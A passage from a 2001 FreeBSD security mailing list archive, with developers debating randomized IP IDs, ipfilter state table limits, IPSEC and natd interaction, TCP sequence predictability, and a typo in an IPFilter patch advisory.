collection > of fragments (of a larger packet). Okay, I'll have to read the RFC again more closely. Kris --82I3+IH0IqGh5yIs Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE621BMWry0BWjoQKURAuD0AJ9HRjVa5c1gEl3KV6omdVeq/GA4EgCgwYG3 kqvhG2YMHV7SFoAmq8OdRaU= =QjdL -----END PGP SIGNATURE----- --82I3+IH0IqGh5yIs-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 13: 8:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 6F73837B422; Mon, 16 Apr 2001 13:08:15 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 0CFD5678B8; Mon, 16 Apr 2001 13:08:15 -0700 (PDT) Date: Mon, 16 Apr 2001 13:08:14 -0700 From: Kris Kennaway To: Darren Reed Cc: Kris Kennaway , Mike Silbersack , Mark T Roberts , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs Message-ID: <20010416130814.A12057@xor.obsecurity.org> References: <20010416120630.C10023@xor.obsecurity.org> <200104162002.GAA09062@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="M9NhX3UHpAaciwkO" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104162002.GAA09062@caligula.anu.edu.au>; from avalon@coombs.anu.edu.au on Tue, Apr 17, 2001 at 06:02:42AM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --M9NhX3UHpAaciwkO Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Apr 17, 2001 at 06:02:42AM +1000, Darren Reed wrote: > > > You should optimize it for mod being 2^n-1 (or make that a requiremen= t). > >=20 > > I'm afraid I don't have time to look at this right now. Perhaps it > > can be revisited (the sysctl defaults to off for now), or Niels Provos > > may be interested in the idea. >=20 > Basically it means '% mod' -> '& mod' and call it with a 2^n-1 number. Oh, okay. > > Well, it still has wrapping properties like a network-order counter, > > i.e. the algorithm attempts to order the output so that it doesn't > > wrap within the segment lifetime. That would be lost without using > > HTONS. >=20 > You're confusing properties of the local number and some opaque bits in > a packet being sent over the 'net. Quite likely. Kris --M9NhX3UHpAaciwkO Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE621EuWry0BWjoQKURApyyAKCBB7Zt5a4iTdLd/p5UfsjwffMpBwCfScng oR2Ef5UAJZl7DV94q312HM0= =hVp+ -----END PGP SIGNATURE----- --M9NhX3UHpAaciwkO-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 13: 9:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id A7C1837B43E for ; Mon, 16 Apr 2001 13:09:47 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id GAA09445; Tue, 17 Apr 2001 06:09:40 +1000 (EST) From: Darren Reed Message-Id: <200104162009.GAA09445@caligula.anu.edu.au> Subject: Re: ipfilter state tables To: rsimmons@wlcg.com (Rob Simmons) Date: Tue, 17 Apr 2001 06:09:40 +1000 (Australia/ACT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "Rob Simmons" at Apr 16, 2001 03:57:57 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Rob Simmons, sie said: > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: RIPEMD160 > > The total number of states that ipfilter can keep is goverened by these > two constants in src/sys/netinet/ip_state.h and > /usr/src/contrib/ipfilter/ip_state.h: > IPSTATE_SIZE > IPSTATE_MAX > > They are set to 5737, and 4013 which is ok for average use, but causes > problems for higher traffic firewalls. Could these two have a kernel > config file knob? This would make life easier :) I'll think about it. It would require something like this, however: ipf -D sysctl -s net.inet.ipf.fr_statesize=123456 ipf -E -f /etc/ipf.conf - you couldn't change the state table size while IPFilter was enabled. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 13:10:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from internal.mail.telinco.net (internal.mail.telinco.net [212.1.128.4]) by hub.freebsd.org (Postfix) with ESMTP id 97D1837B42C for ; Mon, 16 Apr 2001 13:09:56 -0700 (PDT) (envelope-from b.candler@pobox.com) Received: from ppp-dp1-mk-66.access.uk.worldonline.com ([212.74.113.66] helo=bloodhound.uk.worldonline.com) by internal.mail.telinco.net with esmtp (Exim 3.02 #1) id 14pFJr-0000iZ-00; Mon, 16 Apr 2001 21:09:55 +0100 Received: from brian by bloodhound.uk.worldonline.com with local (Exim 3.22 #1) id 14pFJn-00040V-00; Mon, 16 Apr 2001 21:09:51 +0100 Date: Mon, 16 Apr 2001 21:09:50 +0100 From: Brian Candler To: Cy Schubert - ITSD Open Systems Group Cc: Lowell Gilbert , Rasputin , freebsd-security@FreeBSD.ORG Subject: Re: Interaction between ipfw, IPSEC and natd Message-ID: <20010416210950.A14903@linnet.org> References: <20010416112358.A13561@linnet.org> <200104161914.f3GJEMh06453@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <200104161914.f3GJEMh06453@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Mon, Apr 16, 2001 at 12:14:05PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Apr 16, 2001 at 12:14:05PM -0700, Cy Schubert - ITSD Open Systems Group wrote: > I've noticed this with IP Filter as well. For applications where this > is a critical issue, I use the pipsecd port, allowing me to filter on > the external interface (xl0, fxp0, etc), e.g. AH and ESP, and the > tun(4) interface that pipsecd is attached to, e.g. TCP, UDP, ICMP. Ah yes, that's one solution. But pipsecd is limited, e.g. it only supports manually-keyed tunnels AFAIK. A userland implementation like pipsecd, but which used a divert(4) socket like natd, would be cool. Then the sequence of protocol processing would be explicit in the ipfw ruleset. However I can see ipfw becoming less used as people move to ipf(ilter) these days. At least the interaction between ipf and ipnat is documented, if not with IPSEC: http://coombs.anu.edu.au/~avalon/ipfil-flow.html > I realise that this was discussed on this list within the past 6 months > and that one the KAME developers (KAME is obviously IPv6 focused) > indicated that IPv6 addressing would not allow for IPSec packets being > filtered on an interface because IPv6 addresses span all interfaces. Hmm, I don't think that's right. In general, IPv6 addresses _are_ specific to an interface just like IPv4, apart from some special addresses, e.g. link-local and loopback, or multicast. And in any case, a packet coming in through (say) fxp0 can still be tagged as coming in through fxp0. There is even a standard syntax for supporting link-local addresses on a specific interface: e.g. # ping6 fe80::260:97ff:fe40:efab%fxp0 Brian. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 13:16: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 5A80037B440; Mon, 16 Apr 2001 13:15:51 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GBWIXO00.C5J; Mon, 16 Apr 2001 13:15:24 -0700 Message-ID: <3ADB52F4.1A7058B9@globalstar.com> Date: Mon, 16 Apr 2001 13:15:48 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Barney Wolff , "E.B. Dreger" , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs References: <20010416121019.D10023@xor.obsecurity.org> <20010416154249.A49858@mx.databus.com> <20010416125053.A11446@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Mon, Apr 16, 2001 at 03:42:49PM -0400, Barney Wolff wrote: > > If ip_randomid() is an asm rather than C code, I have sometimes > > seen problems with an asm func calling another asm func. That > > was long ago and far away, but is the only reason I can think of > > for that change. > > > > But whether the id is random or a counter, there is no reason to > > htons it, as long as it's treated consistently, with externals > > never compared with internals. > > Surely that can't work since the purpose of that field is for received > packet ordering (unless I'm wrong, I'm not an IPv4 guru and only > skimmed the RFC), and what's ordered in network order isn't ordered in > host order. The IP ID and the Fragment Offset are different fields within the IPv4 header. At least that's what I think you are saying. As far as the whole thread goes, no, I cannot visualize a situation where the IP ID would need to be htons()'ed. The machine generating a datagram creates a "unique" IP ID for each outgoing datagram (actually the IP ID only needs to be unique for each source host, destination host, and protocol). No routers in between ever change it; the receiving machine just uses it to figure out what fragmented datagrams go together to assemble the original datagram. The only question that arises is a non-htons'ed field any less "unique" than the htons'ed one. People have mentioned that we might have a problem with wrap-around. However, preventing wrap around from happening too quickly is just a simple minded way to ensure pseudo-uniqueness of IDs. There are no requirements about wrap around in and of itself. Even if you do use an algorithm that wraps the in-kernel value slowly to prevent wrap around, the IDs on the wire in the reversed byte-order will be just as unique because if it. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 14:17:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail1.vanion.com (mail1.vanion.com [216.84.36.102]) by hub.freebsd.org (Postfix) with ESMTP id DFD9C37B505 for ; Mon, 16 Apr 2001 14:17:33 -0700 (PDT) (envelope-from shieronymus@hiertech.com) Received: from work1 ([216.84.36.100]) by mail1.vanion.com (InterMail vK.4.02.00.10 201-232-116-110 license e9bafdcb120a7d1559850f82300897dc) with SMTP id <20010416212407.LRBB431.mail1@work1> for ; Mon, 16 Apr 2001 15:24:07 -0600 From: "Seth Andreas Hieronymus" To: Subject: tcp sequence prediction question Date: Mon, 16 Apr 2001 15:17:46 -0600 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, When comparing nmap -O output for my FreeBSD server (4.3RC4) and a Linux machine (2.4), there are significant differences in their tcp sequence prediction difficulties. FreeBSD only had on the order of 15,000 - 20,000, while Linux had 3,000,000 - 5,000,000. I saw that the security advisory FreeBSD-SA-00:52.tcp-iss.asc was an attempt to strengthen the randomness of this. Did it help? What is going on with the large differences? Is this a problem at all? Thanks very much. Hope I got the right list. Seth --- Signature --- Seth Andreas Hieronymus President Hieronymus Technologies, Inc. 223 North Wahsatch Avenue, Suite 205 Colorado Springs, CO 80903 719.328.1881 shieronymus@hiertech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 14:46:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from citi.umich.edu (citi.umich.edu [141.211.92.141]) by hub.freebsd.org (Postfix) with ESMTP id 5D6A137B446; Mon, 16 Apr 2001 14:46:12 -0700 (PDT) (envelope-from provos@citi.umich.edu) Received: from citi.umich.edu (ssh-mapper.citi.umich.edu [141.211.92.147]) by citi.umich.edu (Postfix) with ESMTP id 6DA3F207C1; Mon, 16 Apr 2001 17:46:11 -0400 (EDT) Subject: Re: non-random IP IDs From: Niels Provos In-Reply-To: Kris Kennaway, Mon, 16 Apr 2001 12:10:19 PDT To: Kris Kennaway Cc: Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Date: Mon, 16 Apr 2001 17:46:11 -0400 Message-Id: <20010416214611.6DA3F207C1@citi.umich.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20010416121019.D10023@xor.obsecurity.org>, Kris Kennaway writes: >Presumably there was some reasoning there. Niels, can you shed any >light? No reasoning. You do not need the htons(). The fragment ids just need to be unique. An htons() does not change that property. I dont like that code very much. A variable-block-size cipher in counter mode would do the job better. However, what many ppl do not realize is that you can use predictable ip ids to anonymously port scan machines. Bugtraq talks about how to do that. Niels. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 15: 7:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.shellworld.net (ns.shellworld.net [64.29.16.176]) by hub.freebsd.org (Postfix) with ESMTP id 57EA737B440 for ; Mon, 16 Apr 2001 15:07:52 -0700 (PDT) (envelope-from tforrest@ns.shellworld.net) Received: (from tforrest@localhost) by ns.shellworld.net (8.9.3/8.9.3) id SAA10151; Mon, 16 Apr 2001 18:07:28 -0400 Message-Id: <200104162207.SAA10151@ns.shellworld.net> From: "Tommy Forrest - KE4PYM" To: "Chris Faulhaber" , "Igor Podlesny" Cc: "Darren Reed" , "freebsd-security@FreeBSD.ORG" Date: Mon, 16 Apr 2001 18:11:36 -0400 Reply-To: "Tommy Forrest - KE4PYM" X-Mailer: BluePrint Software Works PMMail2000 with Bandit Tagger98 In-Reply-To: <20010416085048.A66477@peitho.fxp.org> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Tag: Bandit Tagger98 - Registered to : KE4PYM Subject: Re: URGENT: Serious bug in IPFilter (fwd) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org So why is it that I get: weedwhacker $ fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/ipfilter.patch fetch: ipfilter.patch: File unavailable (e.g., file not found, no access) On Mon, 16 Apr 2001 08:50:48 -0400, Chris Faulhaber wrote: >On Mon, Apr 16, 2001 at 08:14:23PM +0700, Igor Podlesny wrote: >>=20 >> Hi! >>=20 >> Guys, what's going on? >> The patch still not be available under CVS-tree yet?! >>=20 > >As previously stated, the fixes have been committed to -current >and -stable. For example: > >Revision 1.10.2.4 / (download) - annotate - [select for diffs], Sat Apr 7 0= >3:40:31 2001 UTC (9 days, 9 hours ago) by darrenr=20 >Branch: RELENG_4=20 > >fix security hole created by fragment cache > > >Revision 1.15 / (download) - annotate - [select for diffs], Fri Apr 6 15:52= >:28 2001 UTC (9 days, 20 hours ago) by darrenr=20 >Branch: MAIN=20 >CVS Tags: HEAD=20 > >fix security hole created by fragment cache > > >=46rom http://www.FreeBSD.org/cgi/cvsweb.cgi/src/sys/netinet/ip_frag.c > >--=20 >Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org >-------------------------------------------------------- >FreeBSD: The Power To Serve - http://www.FreeBSD.org Tommy Forrest - KE4PYM - tforrest@shellworld.net http://www.shellworld.net/~tforrest And now, its time, for some useless, bandwidth wasting words of wisdom: I'm an OS/2 developer...I don't NEED a life! PGP Public Key Fingerprint: B9ED C46F C92E 0101 4B4C BFC1 907C A0D0 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 18:29:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 1BBE937B446; Mon, 16 Apr 2001 18:29:15 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id VAA02080; Mon, 16 Apr 2001 21:28:55 -0400 (EDT) (envelope-from wollman) Date: Mon, 16 Apr 2001 21:28:55 -0400 (EDT) From: Garrett Wollman Message-Id: <200104170128.VAA02080@khavrinen.lcs.mit.edu> To: Kris Kennaway Cc: freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs In-Reply-To: <20010416125053.A11446@xor.obsecurity.org> References: <20010416121019.D10023@xor.obsecurity.org> <20010416154249.A49858@mx.databus.com> <20010416125053.A11446@xor.obsecurity.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Surely that can't work since the purpose of that field is for received > packet ordering No. The IP ID is effectively a nonce with respect to the receiving system. The only requirement is that IDs not be repeated while any packet with the same (source, dest) pair is still in the network. This is in practice impossible, so as with TCP we can simply pretend that all packets disappear after 60 seconds. Having said that, on the whole I think this whole idea is utterly pointless. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 18:57:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 9833137B43E; Mon, 16 Apr 2001 18:57:22 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.2/8.11.2) id f3H1v4d87804; Mon, 16 Apr 2001 18:57:04 -0700 (PDT) (envelope-from dillon) Date: Mon, 16 Apr 2001 18:57:04 -0700 (PDT) From: Matt Dillon Message-Id: <200104170157.f3H1v4d87804@earth.backplane.com> To: Niels Provos Cc: Kris Kennaway , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs References: <20010416214611.6DA3F207C1@citi.umich.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :No reasoning. You do not need the htons(). The fragment ids just :need to be unique. An htons() does not change that property. I dont :like that code very much. A variable-block-size cipher in counter :mode would do the job better. : :However, what many ppl do not realize is that you can use predictable :ip ids to anonymously port scan machines. Bugtraq talks about how to :do that. : :Niels. It's not worth doing. We would be introducing unnecessary cpu burn on every single packet we sent out, all to solve a problem that doesn't really exist. Most people doing port scans don't care whether they are anonymous or not, anyway. They just do the scans. Also, port scanning software has gotten a whole lot more sophisticated these days... usually people want to portscan a whole bunch (thousands) of machines all at once, but to prevent detection the newer programs randomize the port and host being tested on a per-packet basis so any given 'victim' doesn't actually see all that much traffic. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 20:33: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from filk.iinet.net.au (syncopation-dns.iinet.net.au [203.59.24.29]) by hub.freebsd.org (Postfix) with SMTP id 2336D37B496 for ; Mon, 16 Apr 2001 20:32:54 -0700 (PDT) (envelope-from julian@elischer.org) Received: (qmail 26709 invoked by uid 666); 17 Apr 2001 03:35:35 -0000 Received: from i186-154.nv.iinet.net.au (HELO elischer.org) (203.59.186.154) by mail.m.iinet.net.au with SMTP; 17 Apr 2001 03:35:35 -0000 Message-ID: <3ADBB93B.3C9DC3DE@elischer.org> Date: Mon, 16 Apr 2001 20:32:11 -0700 From: Julian Elischer X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 5.0-CURRENT i386) X-Accept-Language: en, hu MIME-Version: 1.0 To: Darren Reed Cc: Kris Kennaway , Mike Silbersack , Mark T Roberts , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs References: <200104161836.EAA03291@caligula.anu.edu.au> Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Darren Reed wrote: > > In some mail from Kris Kennaway, sie said: > > > > > > --rwEMma7ioTxnRzrJ > > Content-Type: text/plain; charset=us-ascii > > Content-Disposition: inline > > Content-Transfer-Encoding: quoted-printable > > > > On Mon, Apr 16, 2001 at 02:03:11AM -0700, Kris Kennaway wrote: > > > > > Here's a patch ported from OpenBSD which randomizes this (supposedly > > > such that it respects the constraint of not wrapping within the > > > prescribed time period). I should wrap it in a sysctl, I guess. > > >=20 > > > http://www.freebsd.org/~kris/ipid.patch > > > > Okay, I did this and updated the patch, with the sysctl defaulting to > > off since the random algorithm does add some amount of overhead. > > > > > Comments? > > You should optimize it for mod being 2^n-1 (or make that a requirement). > > Also, drop the HTONS statements, they no longer make sense. Before ip_id > was a counter and so it made sense (sorta) to change its byte ordering to > network. Now it's just a random number so there is no longer any need. there is a site that calculates server uptime from these numbers. All the leading machines are freeBSD. When you do this it will no-longer be able to track us :-( what is the problem in having these numbers sequential? > > Darren > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-net" in the body of the message -- __--_|\ Julian Elischer / \ julian@elischer.org ( OZ ) World tour 2000-2001 ---> X_.---._/ v To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 20:39: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (adam042-060.resnet.wisc.edu [146.151.42.60]) by hub.freebsd.org (Postfix) with ESMTP id 7D03137B43C for ; Mon, 16 Apr 2001 20:38:58 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 16693 invoked by uid 1000); 17 Apr 2001 03:38:52 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 17 Apr 2001 03:38:52 -0000 Date: Mon, 16 Apr 2001 22:38:52 -0500 (CDT) From: Mike Silbersack To: Julian Elischer Cc: Darren Reed , Kris Kennaway , Mark T Roberts , , Subject: Re: non-random IP IDs In-Reply-To: <3ADBB93B.3C9DC3DE@elischer.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 16 Apr 2001, Julian Elischer wrote: > there is a site that calculates server uptime from these numbers. > All the leading machines are freeBSD. When you do this it will > no-longer be able to track us :-( They're using TCP timestamps to do that, not ip ids. And if I get my way, those will be unuseable for uptime detection soon enough... :) > what is the problem in having these numbers sequential? Anonymous port scans, some firewall probing as mentioned by darren, and the ability to see the idleness of a host. Not enough to make randomization the default policy, but certainly enough to justify a sysctl. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 20:45:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id B6B8E37B446; Mon, 16 Apr 2001 20:45:43 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id EAB9066D8B; Mon, 16 Apr 2001 20:45:42 -0700 (PDT) Date: Mon, 16 Apr 2001 20:45:42 -0700 From: Kris Kennaway To: Julian Elischer Cc: freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs Message-ID: <20010416204542.A18881@xor.obsecurity.org> References: <200104161836.EAA03291@caligula.anu.edu.au> <3ADBB93B.3C9DC3DE@elischer.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="azLHFNyN32YCQGCU" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ADBB93B.3C9DC3DE@elischer.org>; from julian@elischer.org on Mon, Apr 16, 2001 at 08:32:11PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --azLHFNyN32YCQGCU Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Apr 16, 2001 at 08:32:11PM -0700, Julian Elischer wrote: > there is a site that calculates server uptime from these numbers. > All the leading machines are freeBSD. When you do this it will=20 > no-longer be able to track us :-( As explained by Mike, the uptime fingerprinting doesn't involve IP IDs, but regardless, information leaks of this kind make it easier to exploit various network stack vulnerabilities. Knowing things like whether a host is idle, being able to measure the rate at which it is generating traffic (without observing the traffic directly), knowing its precise uptime, etc may allow you to mount various attacks (e.g. some of the IP stack vulnerabilties discovered in the past rely on knowing or being able to accurately guess this information). Not everyone may care to reduce this information exposure (e.g. it can add processing overhead which you may not want on a heavily-loaded server), but it should at least be made possible. Kris --azLHFNyN32YCQGCU Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE627xmWry0BWjoQKURAjLXAJ9IwWqtk/3MGSwR8tIu1uQy1moJOgCdEinz o4lmxnIM7DyqMkiLWIzXmjM= =R5nQ -----END PGP SIGNATURE----- --azLHFNyN32YCQGCU-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 22:17:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 2A86337B424 for ; Mon, 16 Apr 2001 22:17:33 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 73E1D66D8B; Mon, 16 Apr 2001 22:17:32 -0700 (PDT) Date: Mon, 16 Apr 2001 22:17:32 -0700 From: Kris Kennaway To: Tommy Forrest - KE4PYM Cc: Chris Faulhaber , Igor Podlesny , Darren Reed , "freebsd-security@FreeBSD.ORG" Subject: Re: URGENT: Serious bug in IPFilter (fwd) Message-ID: <20010416221732.A20245@xor.obsecurity.org> References: <20010416085048.A66477@peitho.fxp.org> <200104162207.SAA10151@ns.shellworld.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="sdtB3X0nJg68CQEu" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104162207.SAA10151@ns.shellworld.net>; from tforrest@shellworld.net on Mon, Apr 16, 2001 at 06:11:36PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --sdtB3X0nJg68CQEu Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Apr 16, 2001 at 06:11:36PM -0400, Tommy Forrest - KE4PYM wrote: > So why is it that I get: >=20 > weedwhacker $ fetch > ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/ipfilter.patch > fetch: ipfilter.patch: File unavailable (e.g., file not found, no > access) There was a typo in the advisory; it should be SA-01:32 Kris --sdtB3X0nJg68CQEu Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE629HsWry0BWjoQKURApoDAKCJ9FrZ8l+KrlXtk7jWvxr+ibdhWgCg6F6U W4R5fJBeh2paPsWkQzmpBqY= =3jCJ -----END PGP SIGNATURE----- --sdtB3X0nJg68CQEu-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 23:30:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 8608637B42C; Mon, 16 Apr 2001 23:30:43 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 0CE8F66D8B; Mon, 16 Apr 2001 23:30:43 -0700 (PDT) Date: Mon, 16 Apr 2001 23:30:42 -0700 From: Kris Kennaway To: Matt Dillon Cc: Niels Provos , Kris Kennaway , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs Message-ID: <20010416233042.A21394@xor.obsecurity.org> References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="LQksG6bCIzRHxTLp" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: 